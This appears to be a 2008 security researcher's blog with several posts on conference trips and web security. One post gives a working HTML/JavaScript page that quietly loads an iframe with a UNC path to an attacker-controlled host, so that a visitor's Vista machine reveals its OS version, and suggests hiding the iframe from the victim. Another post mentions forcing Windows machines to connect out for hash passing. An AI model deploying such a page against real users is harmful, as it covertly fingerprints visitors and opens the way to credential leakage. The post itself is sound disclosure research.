Thursday, May 22, 2008

[ Miscellaneous Security Musings ]

There's not going to be anything too technical or groundbreaking in this post. I'm waiting on a flaw to get fixed by Google right now so I figured I'd post this in the interim.


I've been in the security industry for all of 11 months now and I believe I have a fair amount of knowledge (at least in the web app security arena). As I learned more I began to realize that security is almost cyclical in nature. When defenders (i.e. software companies, network admins) concentrate on one area, attackers will move to another area. After several iterations of switching focus to a different area, the originally vulnerable area will lose focus entirely. Attackers will switch back after finding some new class of vulnerability and the cycle will go on.

This whole train of thought was brought about by a couple things. I've been fortunate enough to be included in research that some really smart people are doing and this theme has popped up recently. Unfortunately I really can't talk about this ongoing research (espeicially since none of it is mine anyway).

But also, something a colleague of mine said the other day reinfoced this. After I discovered that you can put a UNC notation address into an iframe source, he had the idea of forcing the user's Windows computer to connect to a computer of the attacker's choice (think passing the hash). He then turned to me and said "what was old is new again".


I'm not sure where I'm going with this, but it seems to me, this is how it works. Some area of security loses focus, people get sloppy, next thing you know we're seeing vulnerabilities again.

How do you combat this? It's human nature to get complacent. Maybe after a few more years of experience I'll have some creative suggestions for this problem. But for now, I'll just concentrate on the pwnage.

Labels: , , ,

Monday, May 12, 2008

[ We're In @ Black Hat Vegas ]

Holy crap! I can't believe we actually got in!


The first computer security conference I ever attended was Black Hat Vegas last year and now I'm going to be speaking there with Nate McFeters, Billy Rios and John Heasman. Crazy. I've spoken now at Black Hat Japan, Federal and Europe, but Vegas is The Big Show. Thanks to everybody who voted for us.

Our talk is entitled "The Internet Is Broken: Beyond document.cookie - Extreme Client Side Exploitation". We're going to show some pretty sick stuff there and it's going to be a two-session deal. Prepare yourself for a brain-meltingly awesome talk.



See you in Vegas!

Labels: , , , , , ,

Thursday, May 08, 2008

[ Blue Hat Day 2 ]

I think I'm sufficiently recovered to blog about day 2.


I'm just kidding, it wasn't that bad, but I did drink a ton of vodka that night at the IOActive-sponsored limo races, and the Jello shots at the end didn't help at all either.

But let's rewind a bit and reminisce about the talks. Billy and Nitesh started off the conference in style with their Bad Sushi talk. Even though I've seen this talk 3 times I still enjoy it immensely.

Then kuza55 (Alex K.) talked about The Browser and Other Mistakes. It's been said before by others that his grasp of web app security is amazing for his age and I agree, but he's also a pretty cool guy to hang out with as well. He had some great stuff in his talk and some of the things he mentioned gave me ideas for future research.

Another talk I really enjoyed was Manuel Caballeros' talk about resident scripts. That talk was sick. I couldn't believe some of the stuff I was seeing. That will definitely be a focus in some of my future research into other languages.

Also, I got to meet Peleus Uhley and Eric Lee of the Adobe product security team. We worked pretty closely with them to get our Flash DNS Rebinding issue fixed.

When all was said and done I really had a great time there and I can't believe I was actually invited to attend. Thanks again to Katie Moussouris for inviting Nate and I out to the Microsoft campus. And kudos to the MSRC for all their efforts in the security space. It really looks like things are heading in the right direction. Unfortunately that makes my job more difficult...

I'll leave you with a picture from the inside of team Stoners/Hippies limo before our booze was stolen by certain unnamed assailants:


By the way, Nate has a pretty good writeup about Blue Hat over on the ZDNet Zero Day blog. Check it out.

Labels: , , , , , , ,

Monday, May 05, 2008

[ Vista OS Version Trick ]

I found out about this nifty little trick while messing around with UNC notation in the browser. For those wondering, I'll blog about the second day of Blue Hat some other time. Still mentally recovering from the limo races ;)


So, to start this out, I discovered something interesting about UNC notation. You can specify a port number. For example, if I did this in the browser:

\\1.2.3.4:80

It will actually try to connect to port 80, but it does some strange stuff when it tries that. Since Vista doesn't know exactly WHAT service is running on port 80 it will send a couple interesting requests to it. First it sends an OPTIONS HTTP request to that port. Then if it gets an intelligible response it will send some PROPFIND requests. Weird. Here are a couple examples of what it looks like from my Apache server logs:

8.7.6.5 - - [30/Apr/2008:16:35:23 -0500] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/6.0.6000"

5.4.3.2 - - [29/Apr/2008:16:21:38 -0500] "PROPFIND / HTTP/1.0" 200 - "-" "Microsoft-WebDAV-MiniRedir/6.0.6001"

And here is an actual HTTP request:

PROPFIND / HTTP/1.1
Content-Length: 0
Depth: 0
translate: f
User-Agent: Microsoft-WebDAV-MiniRedir/6.0.6000
Host: 1.2.3.4
Proxy-Connection: Keep-Alive

The thing we want to focus on here is the User-Agent header. It invariably says "Microsoft-WebDAV-MiniRedir/" but the version number included after the slash differs depending on what version of Vista the user is running.


Version 6.0.6000 is Vista Ultimate with no service pack and 6.0.6001 is Vista Ultimate with SP1 installed. I haven't had a chance to test other versions. So if we have a page like this:

<html>
<script>
function f() {
document.getElementById("shady").innerHTML = "<iframe name='s' id='s' src='\\\\1.2.3.4:80' width='40%' height='300'>";
}
setTimeout('f()', 500);
</script>
<body>
Nothing shady going on here....<br><br>
<div id="shady"></div>
</body>
</html>

We can force them to give up their Vista version number just by visiting our page.


Obviously we can make the iframe invisible so the error message doesn't show up for the victim.

So this, in and of itself, is not a system compromising attack, but the more information we can glean from the target the more ammunition we have as attackers. By the way, this does not work in XP.

Labels: , , , , , , ,

Friday, May 02, 2008

[ Blue Hat Day 1 ]

I'm not going to say much in this post because I'm really tired right now. Mostly because I traveled today and it's 3:30 am in my time zone. But I'm back in Seattle again (last time was about two weeks ago) and this time it's for Microsoft's Blue Hat conference.


Microsoft held a welcoming party for everybody at the See Sound Lounge in downtown fairly close to the waterfront. Pretty cool place, live DJ, good finger foods and free alcohol. I got to hang out with Nate, Billy, John, Kev, Nitesh, h1kar1, kuza55, fukami, Peleus Uhley and Dan "Sombrero" Kaminsky. I think I see some of these guys more than I see my girlfriend these days.

But anyway, seems like they have a great line up of speakers and topics here and I'm really honored that I was invited to attend. Let the talks begin!

Labels: , , , , , , ,